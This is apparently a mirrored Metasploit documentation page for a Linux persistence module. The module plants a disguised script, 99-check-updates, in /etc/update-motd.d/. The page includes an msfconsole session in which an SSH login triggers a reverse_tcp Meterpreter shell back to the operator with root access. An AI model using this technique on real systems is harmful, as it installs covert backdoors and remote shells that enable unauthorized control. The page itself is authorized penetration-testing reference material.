CoCalc -- motd_persistence.md

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/local/motd_persistence.md
Views: ¹¹⁷⁸⁸

This is a post module that performs a persistence installation on a Linux system using motd. To trigger the persistence execution, an external event such as a user logging in to the system with SSH is required.

Verification Steps

Start msfconsole
Obtain a session on the target machine
use exploit/linux/local/motd_persistence
set session -1
exploit

Module usage

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use exploit/linux/local/motd_persistence
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/motd_persistence) > set session -1
session => -1
msf6 exploit(linux/local/motd_persistence) > exploit

[*] /etc/update-motd.d/99-check-updates written
msf6 exploit(linux/local/motd_persistence) > 
[*] Sending stage (3045380 bytes) to 172.18.49.39
[*] Meterpreter session 2 opened (172.18.52.45:4444 -> 172.18.49.39:41848) at 2024-09-13 03:59:47 -0400
msf6 exploit(linux/local/motd_persistence) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter >

Options

BACKDOOR_NAME

Specify the name of the file to insert in the motd directory. (Default: 99-check-updates)

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Verification Steps

Module usage

Options

BACKDOOR_NAME

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Verification Steps

Module usage

Options

BACKDOOR_NAME

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.